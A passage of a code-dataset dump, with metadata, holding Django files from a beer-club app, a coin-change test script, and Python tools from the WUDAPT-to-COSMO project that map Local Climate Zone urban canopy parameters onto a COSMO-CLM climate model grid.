"alpha_fraction": 0.513189435005188,
"alphanum_fraction": 0.5899280309677124,
"avg_line_length": 20.947368621826172,
"blob_id": "0580af0f34fdb54ae434822bd1f01a22feb70077",
"content_id": "42a78f625aa32df0eb39b8b8a069c2c22be12e1e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 417,
"license_type": "permissive",
"max_line_length": 52,
"num_lines": 19,
"path": "/feer_club/feer/migrations/0014_auto_20160206_2050.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-02-06 19:50\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('feer', '0013_auto_20160206_1855'),\n ]\n\n operations = [\n migrations.AlterUniqueTogether(\n name='rating',\n unique_together=set([('beer', 'user')]),\n ),\n ]\n"
},
{
"alpha_fraction": 0.8121827244758606,
"alphanum_fraction": 0.8121827244758606,
"avg_line_length": 27.14285659790039,
"blob_id": "2a9d7cdd1745175c805f7cd56c77d15e92c9a870",
"content_id": "190bb4b0f5ca545e79e9944f2bf0410c4dd3ffeb",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 197,
"license_type": "permissive",
"max_line_length": 50,
"num_lines": 7,
"path": "/feer_club/feer/admin.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom .models import Beer, Order, OrderItem, Rating\n\nadmin.site.register(Beer)\nadmin.site.register(Order)\nadmin.site.register(OrderItem)\nadmin.site.register(Rating)\n"
},
{
"alpha_fraction": 0.5063613057136536,
"alphanum_fraction": 0.5877862572669983,
"avg_line_length": 19.6842098236084,
"blob_id": "c3726cd87b90b0a62d32a143908d19fd1104599b",
"content_id": "07f96207062c3837ea155cbf58ae07cce60c6b99",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 393,
"license_type": "permissive",
"max_line_length": 47,
"num_lines": 19,
"path": "/feer_club/feer/migrations/0004_auto_20160114_1844.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-01-14 17:44\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('feer', '0003_auto_20160114_1836'),\n ]\n\n operations = [\n migrations.RenameModel(\n old_name='OrderList',\n new_name='Order',\n ),\n ]\n"
}
] | 25 |
francikjm/project2 | https://github.com/francikjm/project2 | 2250e28372c9146adfef5769c89bb17bc7cdf362 | e9b654b411b5e005bee19b3153bd50cc81e920ee | 93febd150e058d545884a09bd08121e786074558 | refs/heads/master | 2021-01-20T07:07:50.880496 | 2017-05-01T23:30:36 | 2017-05-01T23:30:36 | 89,964,500 | 0 | 0 | null | 2017-05-01T21:27:50 | 2017-04-27T15:53:41 | 2017-04-28T00:37:20 | null | [
{
"alpha_fraction": 0.49602648615837097,
"alphanum_fraction": 0.5456953644752502,
"avg_line_length": 29.200000762939453,
"blob_id": "4a366592e6efd20b0cf7cad34e3ba4d0eaeb3c20",
"content_id": "b812bf85f9ce2bae8450adc553af16871df322eb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3026,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 100,
"path": "/testalgos.py",
"repo_name": "francikjm/project2",
"src_encoding": "UTF-8",
"text": "# This file will test all four functions using the same test cases\n\n#import 2nd algorithm\n\n#import 3rd algorithm\n\n# import Juans's 2nd algorithm\nfrom algo2 import changegreedy as getchange2\n\n\ndef main():\n\n #Test Cases\n testOne = [1,2,4,8]\n testTwo = [1,3,7,12]\n testThree = [1,3,7,12]\n\n\n #3. Suppose\n # V1 = [1, 2, 6, 12, 24, 48, 60],\n # V2 = [1, 5, 10, 25, 50] and\n # V3 = [1, 6, 13, 37, 150],\n # for each integer value of A in [1, 2, 3, …, 50]\n # determine the number of coins that changeslow.\n # changegreedy and changedp requires for each denomination set.\n V1 = [1, 2, 6, 12, 24, 48, 60]\n V2 = [1, 5, 10, 25, 50]\n V3 = [1, 6, 13, 37, 150]\n questhree_Testcase = []\n questhree_Testcase.append(V1)\n questhree_Testcase.append(V2)\n questhree_Testcase.append(V3)\n\n\n testCase = []\n testCase.append(testOne)\n testCase.append(testTwo)\n testCase.append(testThree)\n\n\n coinAmount = [15, 29, 31]\n\n\n for x in range(1, 2):\n algoID = x\n\n if (algoID == 1):\n getchange = getchange2\n\n elif (algoID == 2):\n print(\"algoID\",algoID)\n getchange = getchange2\n\n else:\n print(algoID)\n\n # Loop through test cases\n for testinput in range(0, len(testCase)):\n cArray, m = getchange(testCase[testinput], coinAmount[testinput])\n print(\"Array\", cArray)\n print(\"m\", m)\n\n\n # Loop for each integer value of A in [1, 2, 3, …, 50] in test cases V1, V2 and V3\n for amount in range(1, 51):\n #Values of V1\n cArray, m = getchange(questhree_Testcase[0], amount)\n print(\"AMOUNT of \", amount, \"|\" \"ARRAY = \", cArray)\n print(\"Number of Coins = \", m)\n # Values of V2\n cArray, m = getchange(questhree_Testcase[1], amount)\n print(\"AMOUNT of \", amount, \"|\" \"ARRAY = \", cArray)\n print(\"Number of Coins = \", m)\n # Values of V3\n cArray, m = getchange(questhree_Testcase[2], amount)\n print(\"AMOUNT of \", amount, \"|\" \"ARRAY = \", cArray)\n print(\"Number of Coins = \", m)\n\n\n\n # For each integer value of A in [2000, 2001, 2002, …, 2200]\n # determine the number of coins that\n # changegreedy and changedp requires for each denomination set\n for amount in range(2000, 2200):\n #Values of V1\n cArray, m = getchange(questhree_Testcase[0], amount)\n print(\"AMOUNT of \", amount, \"|\" \"ARRAY = \", cArray)\n print(\"Number of Coins = \", m)\n # Values of V2\n cArray, m = getchange(questhree_Testcase[1], amount)\n print(\"AMOUNT of \", amount, \"|\" \"ARRAY = \", cArray)\n print(\"Number of Coins = \", m)\n # Values of V3\n cArray, m = getchange(questhree_Testcase[2], amount)\n print(\"AMOUNT of \", amount, \"|\" \"ARRAY = \", cArray)\n print(\"Number of Coins = \", m)\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.7878788113594055,
"alphanum_fraction": 0.8181818127632141,
"avg_line_length": 15.5,
"blob_id": "566789f6e0170b5ee474be3d99fb9617b9f48235",
"content_id": "447eb855789b681628d24ddd40991bc4ef79d1f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 33,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 2,
"path": "/README.md",
"repo_name": "francikjm/project2",
"src_encoding": "UTF-8",
"text": "# project2\ncoin change algorithm\n"
}
] | 2 |
shepherdmeng/WUDAPT-to-COSMO | https://github.com/shepherdmeng/WUDAPT-to-COSMO | 487b0f533df249bced14b0ade3feaf5283ca9930 | 9b01eb2ffa22febc6c50b8170b2984c63f971c3a | a1c0f20d73e30919318ea2e322ad0f714927df4e | refs/heads/master | 2023-04-12T05:00:22.446334 | 2021-05-10T10:11:21 | 2021-05-10T10:11:21 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6844903826713562,
"alphanum_fraction": 0.7550960183143616,
"avg_line_length": 68.06122589111328,
"blob_id": "c7d7a32ef68595213ad51b7bd11756e0335e5dbf",
"content_id": "bbcba646deb0cc97e73e907fbfd15ffd7b1b0374",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3387,
"license_type": "no_license",
"max_line_length": 769,
"num_lines": 49,
"path": "/README.md",
"repo_name": "shepherdmeng/WUDAPT-to-COSMO",
"src_encoding": "UTF-8",
"text": "# WUDAPT-to-COSMO\n\nSet of tools to use Local Climate Zone (LCZ)-based urban canopy parameters in DWD's COSMO-CLM NWP and regional climate model.\n\n## Citaton\nVarentsov, M., Samsonov, T., Demuzere, M., (2020). Impact of urban canopy parameters on a megacity’s modelled thermal environment. Atmosphere 11(12), 1349; [https://doi.org/10.3390/atmos11121349](https://www.mdpi.com/2073-4433/11/12/1349).\n\n## Context\nTERRA_URB is the urban canopy parameterization embedded in TERRA-ML, the land surface model in COSMO-CLM. By default it uses impervious surface area information from the [Copernicus Land Monitoring Service](https://land.copernicus.eu/pan-european/high-resolution-layers/imperviousness) (for Europe) / [National Geophysical Data Center](https://databasin.org/datasets/016d2235a5ed43ad83ceeed6c408d149) (global) and anthropogenic heat flux information from [Flanner et al. (2010)](https://agupubs.onlinelibrary.wiley.com/doi/full/10.1029/2008gl036465). All other geometrical, thermal and radiative urban canopy parameters are spatially invariant, and set to the bulk values provided in Table 1 of [Wouters et al., 2016](https://gmd.copernicus.org/articles/9/3027/2016/)).\n\nThe set of tools provided in this repo allow one to introduce LCZ-based urban canopy parameters, compiled from [Stewart and Oke (2012)](http://10.1175/BAMS-D-11-00019.1) and [Stewart et al. (2014)](http://10.1002/joc.3746).\n\nThis work is an outcome of AEVUS I and II, the COSMO Priority Tasks on \"Analysis and evaluation of the TERRA_URB scheme\". More info [here](http://www.cosmo-model.org/content/tasks/priorityTasks/default.htm) (project pages only accessible to COSMO members). Preliminary test results of LCZ parameters in COSMO-CLM are also described in Brousse et al. ([2019](https://doi.org/10.1016/j.uclim.2018.12.004), [2020](https://onlinelibrary.wiley.com/doi/abs/10.1002/joc.6477)) and Van de Walle et al. (20xx, under review). \n\n\n\n## Requirements\n* Be a member of the [COSMO-CLM community](https://wiki.coast.hzg.de/clmcom/), in order to be able to access [EXTPAR](https://wiki.coast.hzg.de/clmcom/external-data-98599196.html).\n* Have your domain file available from EXTPAR (netcdf file)\n* an LCZ map covering the same region of interest. Sources for existing LCZ maps:\n * Europe: [paper](https://journals.plos.org/plosone/article?id=10.1371/journal.pone.0214474) | [data](http://doi.org/10.6084/m9.figshare.13322450.v1)\n * Continental United States: [paper](https://doi.org/10.1038/s41597-020-00605-z) | [data](https://doi.org/10.6084/m9.figshare.11416950.v1) \n * An online LCZ Generator tool is currently under development; a beta version can be accessed [here](https://lcz-generator.geographie.rub.de/). Please contact Matthias.Demuzere @ rub.de for more information.\n \n\n\n## Instructions\n\nIt is advised to use a python virtual environment:\n1. Go into scriptdir: `cd /SCRIPT/DIR/`\n2. Create virtual environment: `python3 -m venv venv` or `virtualenv venv`\n3. Install module requirements: `venv/bin/pip install -r requirements.txt`\n4. Use `venv/bin/python` to run scripts.\n\nThe `requirements.txt` can be generated using `pipreqs`: \n```\ncd /SCRIPT/DIR/\npipreqs --ignore=terra/ .\n```\n\n\n### Execute\n\nThe run code is currently configured for the Moscow case, as developed in Varentsov et al.\nCLM and LCZ input data used in this study is provided under `data/`.\n\n```\nvenv/bin/pip/python run.py\n```\n\n"
},
{
"alpha_fraction": 0.7008830308914185,
"alphanum_fraction": 0.7130242586135864,
"avg_line_length": 24.19444465637207,
"blob_id": "779da69e17ac43937e9c0eb516a93bfd1e34b22d",
"content_id": "6a1bfc7715a32d4d35c6a37d28ef08c27b9bd3d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 906,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 36,
"path": "/run.py",
"repo_name": "shepherdmeng/WUDAPT-to-COSMO",
"src_encoding": "UTF-8",
"text": "import os\nabspath = os.path.abspath(__file__)\nWORKDIR = os.path.dirname(abspath)\nos.chdir(WORKDIR)\nfrom utils import lcz_to_cosmo, remove_double_counting\n\n## Adjust directory here\nCLMFILE = f\"{WORKDIR}/data/MSK_0.009bg3_Globcover.nc\"\nLCZFILE = f\"{WORKDIR}/data/LCZ_Russia_Moscow.tif\"\n\n# FILES\nUCPFILE = f\"{WORKDIR}/tables/LCZ_UCP_default.csv\"\nGCFILE = f\"{WORKDIR}/tables/globcover_lookup.csv\"\n\n\n# EXECUTE FUNCTIONS\n# 1. Assign UCP values to LCZ map and convert to COSMO Grid\nCLM_FILE_NEW = lcz_to_cosmo(\n ucpFile=UCPFILE,\n clmFile=CLMFILE,\n lczFile=LCZFILE,\n bandNr=3,\n ucpVersion='default',\n nrLcz=17,\n interpMethod='linear',\n aggregation=True,\n aggregationScale=2,\n isaWeight=True,\n saiWeight=False,\n fileNameExt='_Varentsov_etal_Atm')\n\n# 2. Address the double counting issue.\nremove_double_counting(\n clmFile=CLM_FILE_NEW,\n gcFile=GCFILE,\n removeUrban=True)"
},
{
"alpha_fraction": 0.5699892044067383,
"alphanum_fraction": 0.5874999761581421,
"avg_line_length": 44.490196228027344,
"blob_id": "176a1dd1651ed59ddb7fd426c59274a72449d890",
"content_id": "6e3f99baea13259d00888d71d567aa169c73032f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 18572,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 408,
"path": "/utils.py",
"repo_name": "shepherdmeng/WUDAPT-to-COSMO",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport numpy as np\nimport xarray as xr\nfrom scipy.interpolate import RegularGridInterpolator\nimport scipy.ndimage\nimport rasterio\n\n## Helper function to prepare the urban canopy data.\ndef prepare_ucp_lookup(ucpFile, saiWeight=False, snow_f=0, alb_snow=0.70, emi_snow=0.997):\n\n \"\"\"\n\n AUTHOR: Matthias Demuzere (matthias.demuzere [@] rub.de)\n\n :param ucpFile : Absolute path to urban canopy parameter csv file.\n :param saiWeight: Weigh parameters according to Surface Area Index (Default = False)\n :param snow_f : snow fraction (default = 0)\n :param alb_snow : snow albedo (default = 0.7)\n :param emi_snow : emissivity albedo (default = 0.997)\n :return:\n\n :INFO:\n Code generally follows SURY: https://github.com/hendrikwout/sury/blob/master/sury.py\n\n * Wouters, H., Demuzere, M., Blahak, U., Fortuniak, K., Maiheu., B.,\n Camps, J., Tielemans, and N. P. M. van Lipzig, 2016. The efficient\n urban-canopy dependency parametrization SURY (v1.0) for atmospheric modelling:\n description and application with the COSMO-CLM model (v5.0_clm6) for a\n Belgian Summer, Geosci. Model Dev., 2016.\n\n Define the look-up table, based on the values of:\n * Stewart, I. D., & Oke, T. R. (2012). Local Climate Zones for Urban Temperature Studies.\n Bulletin of the American Meteorological Society, 93(12), 1879–1900.\n * Stewart, I. D., Oke, T. R., & Krayenhoff, E. S. (2014). Evaluation of the ‘local climate zone’\n scheme using temperature observations and model simulations. International Journal of Climatology,\n 34(4), 1062–1080. https://doi.org/10.1002/joc.3746\n\n The latter paper describes thermal admittance values of facets only. Heat conductivity and\n capacity values are obtained via Scott Krayenhoff (personal communication).\n\n \"\"\"\n\n ## Read look-up table\n ucp = pd.read_csv(ucpFile,sep=';',index_col=0).iloc[:17,:]\n\n ## Canyon albedo reduction factor, eq. 15\n psi_canyon = np.exp(-0.6 * ucp['URB_H2W'])\n psi_canyon[10:] = 0 # Set to zero for non-urban LCZs\n\n ## Total albedo reduction factor, eq. 14\n psi_bulk = psi_canyon * (1 - ucp['URB_BLDFR']) + ucp['URB_BLDFR']\n psi_bulk[10:] = 0 # Set to zero for non-urban LCZs\n\n ## Bulk shortwave albedo, using facet information. Eq 16\n alb_roof_snow = ucp['URB_RfALB'] * (1. - snow_f) + alb_snow * snow_f\n alb_road_snow = ucp['URB_RdALB'] * (1. - snow_f) + alb_snow * snow_f\n alb_wall_snow = ucp['URB_WaALB'] * (1. - snow_f) + alb_snow * snow_f\n ucp['URB_SALB_BK'] = (alb_road_snow + 2. * ucp['URB_H2W'] * alb_wall_snow) / \\\n (1. + 2. * ucp['URB_H2W']) * psi_canyon * (1. - ucp['URB_BLDFR']) \\\n + alb_roof_snow * ucp['URB_BLDFR']\n ucp.loc[11:, 'URB_SALB_BK'] = 0\n # ucp['URB_TALB'] = ucp['URB_SALB'].copy()\n\n ## Bulk emissivity, using facet information. Eq 16\n emi_roof_snow = (1. - ucp['URB_RfEMI']) * (1. - snow_f) + (1. - emi_snow) * snow_f\n emi_road_snow = (1. - ucp['URB_RdEMI']) * (1. - snow_f) + (1. - emi_snow) * snow_f\n emi_wall_snow = (1. - ucp['URB_WaEMI']) * (1. - snow_f) + (1. - emi_snow) * snow_f\n ucp['URB_EMIS_BK'] = 1. - ((emi_road_snow + 2. * ucp['URB_H2W'] * emi_wall_snow) \\\n / (1. + 2. * ucp['URB_H2W']) * psi_canyon * (1. - ucp['URB_BLDFR']) \\\n + emi_roof_snow * ucp['URB_BLDFR'])\n ucp.loc[11:, 'URB_EMIS_BK'] = 0\n\n ## Bulk thermal albedo\n ucp['URB_TALB_BK'] = 1 - ucp['URB_EMIS_BK']\n ucp.loc[11:, 'URB_TALB_BK'] = 0\n\n ## Calculate Surface Area Index from geometrical considerations (Eq. 3)\n SAI = (1. + 2. * ucp['URB_H2W']) * (1. - ucp['URB_BLDFR']) + ucp['URB_BLDFR']\n\n ## Get mean Heat capacity and conductivity, using eq. 10, 11 and 4.\n ucp['URB_HCON'] = ((1 - ucp['URB_BLDFR']) / SAI) * \\\n (2 * ucp['URB_H2W'] * ucp['URB_WaHCON'] + ucp['URB_RdHCON']) + \\\n (ucp['URB_BLDFR'] / SAI * ucp['URB_RfHCON'])\n ucp['URB_HCAP'] = ((1 - ucp['URB_BLDFR']) / SAI) * \\\n (2 * ucp['URB_H2W'] * ucp['URB_WaHCAP'] + ucp['URB_RdHCAP']) + \\\n (ucp['URB_BLDFR'] / SAI * ucp['URB_RfHCAP'])\n\n ## Mean facet-level albedo and emissivity based on eq. 10\n ## Only added for testing and potential comparison with other models\n ## These values are currently not used in TERRA_URB.\n ucp['URB_EMIS_FL'] = ((1 - ucp['URB_BLDFR']) / SAI) * \\\n (2 * ucp['URB_H2W'] * ucp['URB_WaEMI'] + ucp['URB_RdEMI']) + \\\n (ucp['URB_BLDFR'] / SAI * ucp['URB_RfEMI'])\n ucp['URB_SALB_FL'] = ((1 - ucp['URB_BLDFR']) / SAI) * \\\n (2 * ucp['URB_H2W'] * ucp['URB_WaALB'] + ucp['URB_RdALB']) + \\\n (ucp['URB_BLDFR'] / SAI * ucp['URB_RfALB'])\n ucp['URB_TALB_FL'] = 1 - ucp['URB_EMIS_FL']\n ucp.loc[11:, 'URB_SALB_FL'] = 0\n ucp.loc[11:, 'URB_TALB_FL'] = 0\n\n ## For now, TERRA-URB only reads in one average facet-level albedo.\n ## The bulk calculation from eqs. 13 is done within TERRA_URB\n ## Therefore, the bulk value needs to be reversed back to a mean\n ## facet value, so that eq. 13 is solved for alb = alb_bulk / psi_bulk\n ## The same is done for the emissivity.\n ucp['URB_SALB'] = ucp['URB_SALB_BK'] / psi_bulk\n ucp['URB_TALB'] = ucp['URB_TALB_BK'] / psi_bulk\n ucp['URB_EMIS'] = 1 - ucp['URB_TALB']\n\n ## Also add the thermal admittance\n # ucp['URB_TADM'] = (ucp['URB_HCAP']*ucp['URB_HCON'])**0.5\n\n ## iS SAI weighting requested, according to Eq. 4?\n ## This is done within TERRA_URB, so no need to do for COSMO/CLM input files.\n if saiWeight:\n ucp['URB_HCON'] = ucp['URB_HCON'] * SAI\n ucp['URB_HCAP'] = ucp['URB_HCAP'] * SAI\n # ucp['URB_TADM'] = ucp['URB_TADM'] * SAI\n\n return ucp\n\n\n## Helper function to do the interpolation\ndef cosmo_interpolator(xLcz, yLcz, dataLcz, xClm, yClm, interpMethod='linear',\n aggregation=True, aggregationScale = 2):\n\n \"\"\"\n AUTHOR: Matthias Demuzere (matthias.demuzere [@] rub.de)\n\n :param xLcz: values of LCZ longitudes\n :param yLcz: values of LCZ latitudes\n :param dataLcz: 2D array of LCZ parameter value\n :param xClm: values of COSMO-CLM longitudes\n :param yClm: values of COSMO-CLM latitudes\n :param interpMethod: \"linear\" (default) or \"nearest\"\n :param aggregation: Boolean to aggregate or not\n :param aggregationScale: scaler integer to do a pre-processing aggregation (default = 2, ~ half size of CLM dimensions)\n\n :return: 2d-array of the lcz paramater on the COSMO-CLM grid / dimensions\n \"\"\"\n\n if aggregation:\n ## First aggregate the LCZ data, to ~ twice the size of the CLM domain (defined by aggregationParam)\n aggNr = np.round(np.max([len(xClm) / len(xLcz), len(yClm) / len(yLcz)]), 3)\n lczVarAgg = scipy.ndimage.zoom(dataLcz, aggNr * aggregationScale, order=1);\n\n ## Get corresponding new LCZ lat and lon values\n latsAgg = np.linspace(yLcz.min(), yLcz.max(), lczVarAgg.shape[0])\n lonsAgg = np.linspace(xLcz.min(), xLcz.max(), lczVarAgg.shape[1])\n\n interp_object = RegularGridInterpolator((latsAgg, lonsAgg), lczVarAgg, method=interpMethod)\n\n else:\n interp_object = RegularGridInterpolator((yLcz, xLcz), dataLcz, method=interpMethod)\n\n return interp_object, aggNr\n\n\n\ndef lcz_to_cosmo(ucpFile, clmFile, lczFile, bandNr, ucpVersion, nrLcz=17,\n interpMethod='linear', aggregation=True, aggregationScale=2,\n isaWeight=True, saiWeight=False,\n fileNameExt=''):\n \"\"\"\n Function to introduce LCZ Urban Canopy Parameters into CCLM domain file\n\n AUTHOR: Matthias Demuzere (matthias.demuzere [@] rub.de)\n\n :param ucpFile: full absolute path name to ucp .csv table.\n :param clmFile: full absolute path name to COSMO-CLM domain file\n :param lczFile: full absolute path name to lcz geotiff file.\n :param bandNr: integer, referring to version of LCZ map:\n 0 = lcz, 1 = lczFilter, 2 = lczFilter CGLS mask, 3 = lczFilter GAIA mask\n :param ucpVersion: version of ucp file used: 'high' (Stewart and Oke, 2014) or 'default'\n :param gcFile: full path to file containing Globcover parameters per class\n :param nrLcz: highest value of LCZ class present (default is 17)\n :param interpMethod: 'linear' (default) or 'nearest'\n :param aggregation: Boolean to aggregate or not\n :param aggregationScale: scaler integer to do a pre-processing aggregation (default = 2, ~ half size of CLM dimensions)\n :param isaWeight: Boolean. Weighs parameter according to ISA fraction (default == True)\n :param saiWeight: Weigh parameters according to Surface Area Index (Default = False)\n :param fileNameExt: provide opportunity for additional file name extension (default: '')\n\n :return:\n LAFxxxxxx_lcz.nc file, with\n - additional fields for 'ISA','AHF','BLDH','BLDFR','HW','CVS','ALB'\n - correcting for double counting for Globcover affected fields\n\n References:\n - Stewart, I.D., Oke, T.R., 2012. Local Climate Zones for Urban Temperature Studies.\n Bull. Am. Meteorol. Soc. 93, 1879–1900. https://doi.org/10.1175/BAMS-D-11-00019.1\n - Wouters, H., Demuzere, M., Blahak, U., Fortuniak, K., Maiheu, B., Camps, J.,\n Tielemans, D., van Lipzig, N.P.M., 2016. Efficient urban canopy parametrization\n for atmospheric modelling: description and application with the COSMO-CLM model\n (version 5.0_clm6) for a Belgian Summer. Geosci. Model Dev. 9, 3027–3054.\n https://doi.org/10.5194/gmd-2016-58\n\n \"\"\"\n\n ## for testing\n #nrLcz = 17; interpMethod = 'linear'; aggregation = True; aggregationScale = 2; isaWeight = True\n\n lookupUCP = prepare_ucp_lookup(ucpFile,saiWeight)\n\n ## Read lcz file, make copy of original domainFile\n lczMap = xr.open_rasterio(lczFile)[bandNr,:,:].astype('int')\n lczMap = lczMap.rename({'x': 'lon', 'y': 'lat'})\n lczMap = lczMap.reindex(lat=lczMap.lat[::-1])\n\n ## Read LCZ map coordinates\n xLcz, yLcz = lczMap.lon.values, lczMap.lat.values\n\n ## Create a new domain file as a copy of the original one\n clmFileNew = clmFile.replace('.nc','_lcz_{}_{}{}.nc'.format(bandNr,ucpVersion,fileNameExt))\n clm = xr.open_dataset(clmFile)\n\n ## Read COSMO-CLM coordinates\n xClm, yClm = clm.lon.values, clm.lat.values\n\n ## Define list of all urban parameters.\n ## Only change FR_PAVED and URBAN after fixing double counting.\n urbParameters = ['ISA',\n 'FR_PAVED',\n 'URB_BLDFR',\n 'URB_BLDH',\n 'URB_H2W',\n 'AHF',\n 'URB_SALB',\n 'URB_TALB',\n 'URB_EMIS',\n 'URB_SALB_FL',\n 'URB_TALB_FL',\n 'URB_EMIS_FL',\n 'URB_SALB_BK',\n 'URB_TALB_BK',\n 'URB_EMIS_BK',\n 'URB_HCON',\n 'URB_HCAP']\n\n ## Create maps of UCPs, store in xarray data object\n for ucp in urbParameters:\n\n ## If variables not present, create variable with dummy values\n ## in dataarray, and overwrite below\n if not ucp in list(clm.variables.keys()):\n clm[ucp] = clm['URBAN'].copy()\n\n keys = np.arange(1, nrLcz+1, 1)\n values = lookupUCP[ucp]\n out = np.empty((max(keys) + 1,), object); out[list(keys)] = values\n dataLcz = np.array(out[lczMap], dtype='float')\n\n ## Set nans to 0, required for interpolation.\n dataLcz[np.isnan(dataLcz)] = 0\n\n ## Store isa separately for weighting\n if ucp == 'ISA':\n dataISA = dataLcz\n\n ## Weigh values according to ISA - Step 1\n if isaWeight == True and not ucp in ['ISA','AHF','FR_PAVED']:\n print(\"isaWeight on: ucp's are being weighed by ISA fraction\")\n dataLcz = dataLcz * dataISA\n\n ## Get interpolation object\n interp_object, aggNr = cosmo_interpolator(xLcz, yLcz, dataLcz, xClm, yClm,\n interpMethod, aggregation, aggregationScale)\n\n ## Apply to get resampled data\n clmPoints = yClm, xClm\n dataLczResampled = interp_object(clmPoints)\n\n ## Store isa lczClm separately for weighting\n if ucp == 'ISA':\n dataISAres = dataLczResampled\n\n ## re-Weigh values according to ISA - Step 2\n if isaWeight == True and not ucp in ['ISA','AHF','FR_PAVED']:\n dataLczResampled = dataLczResampled / dataISAres\n\n ## Set all nans to zero, otherwise issues with COSMO.\n dataLczResampled[np.isnan(dataLczResampled)] = 0\n\n ## Add values to file.\n clm[ucp].values = dataLczResampled\n\n print('{} field has been updated'.format(ucp))\n\n ## Change variable attributes\n clm[ucp].attrs['data_set'] = 'Values derived from Local Climate Zone properties'\n\n ## Set FR_PAVED equal to ISA.\n clm['FR_PAVED'].values = clm['ISA'].values\n\n ## Add global attribute\n clm.attrs['note2'] = 'LCZ Urban canopy look up data retrieved from Stewart and Oke (2012) \\n' \\\n ' and Stewart et al. (2014). Conversion to bulk properties done via SURY \\n' \\\n 'from Wouters et al. (2016): https://github.com/hendrikwout/sury/blob/master/sury.py.'\n\n ## Write to file\n print(\"Writing COSMO-CLM domain with LCZ values to {}\".format(clmFileNew))\n clm.to_netcdf('{}'.format(clmFileNew))\n\n return '{}'.format(clmFileNew)\n\n\ndef remove_double_counting(clmFile,gcFile,removeUrban=True,qLow=0.25,qHigh=0.75,fileNameExt=''):\n\n \"\"\"\n Function to remove the double counting of URBAN-BASED parameter values\n\n AUTHOR: Matthias Demuzere (matthias.demuzere [@] rub.de)\n\n :param clmFile: full absolute path name to COSMO-CLM domain file\n :param gcFile: full absolute path name to globcover look-up table\n :param removeUrban: Boolean to indicate if URBAN effect from GlobCover needs to be removed (default=True)\n If False, the procedure from EXTPAR is reconstructed, values should =~ input file.\n :param qLow, qHigh: Low and high quantile.\n Where URBAN == 1, values are random sampled between qLow qnd qHigh (from URBAN == 0 pixels)\n :param fileNameExt: provide opportunity for additional file name extension (default: '')\n\n :return:\n Adjusted COSMO/CLM domain file, with:\n * fixes for (if enabeld): 'Z0', 'PLCOV_MN', 'PLCOV_MX', 'LAI_MN', 'LAI_MX', 'ROOTDP',\n 'EMIS_RAD', 'SKC', 'RSMIN', 'FOR_D', 'FOR_E'\n * URBAN and FR_PAVED set to ISA.\n \"\"\"\n\n ## Constants\n hp = 30 # height of Prandtl-layer, taken from EXTPAR's mo_agg_globcover.f90\n\n ## Read original file, adjusted for LCZs\n clm = xr.open_dataset('{}'.format(clmFile)) #, decode_coords=False)\n\n ## Make string for output file, allow for file name extensions\n clm_oFile = clmFile.replace('.nc', '_fixDC_{}{}.nc'.format(removeUrban,fileNameExt))\n\n ## Read relevant fields for double counting\n lu = clm.LU_CLASS_FRACTION.values\n urb = clm.URBAN.values\n frl = clm.FR_LAND.values\n\n ## Read parameterfile\n gc_lookup = pd.read_csv(gcFile, sep=';').iloc[:,2:]\n gc_vars = gc_lookup.columns.to_list()\n\n ## Whether or not to fix the double counting\n if removeUrban:\n print('Double counting will be removed from the urban pixels')\n nonUrban = [x for x in range(23) if x != 18]\n else:\n print('Double counting not addressed: reconstruction of original domain file values.')\n nonUrban = list(range(23))\n\n ## Define the pixels that need to be altered\n touchPix = np.asarray(np.logical_and(np.logical_and(urb > 0, urb != 1), frl > 0.5))\n print('{} pixels identified with 0 < urb < 1, frl > 0.5'.format(np.sum(touchPix)))\n\n ## Start replacing the values, use array broadcasting for efficiency\n for gc_var in gc_vars:\n if gc_var in list(clm.var()):\n print('Fixing double counting for {}: {}'.format(gc_var, removeUrban))\n\n ## Initialize array to store new values in.\n clmValue = clm[gc_var].values\n tmp = clmValue.copy()\n\n #tmp[np.isnan(clmValue)] = np.nan\n\n ## Stretch land use to unity if urban fractions are removed.\n luStretched = lu[nonUrban, :, :] * (1 / np.sum(lu[nonUrban, :, :], axis=0))\n\n if gc_var in ['PLCOV_MX', 'PLCOV_MN', 'EMIS_RAD', 'SKC']:\n tmp_v = np.sum(luStretched * np.expand_dims(gc_lookup[gc_var][nonUrban], axis=[1, 2]), axis=0)\n tmp[touchPix] = tmp_v[touchPix]\n\n elif gc_var in ['Z0']:\n tmp_v = np.sum(\n luStretched / np.expand_dims(np.log(hp) - np.log(gc_lookup[gc_var][nonUrban]), axis=[1, 2]),\n axis=0)\n tmp[touchPix] = hp * np.exp(-1 / tmp_v[touchPix])\n\n elif gc_var in ['ROOTDP', 'LAI_MN', 'LAI_MX', 'FOR_D', 'FOR_E']:\n luStretched = lu[nonUrban, :, :] * (1 / np.sum(lu[nonUrban, :, :]))\n tmp_n = np.sum(\n luStretched * np.expand_dims(gc_lookup['PLCOV_MX'][nonUrban] * gc_lookup[gc_var][nonUrban], axis=[1, 2]),\n 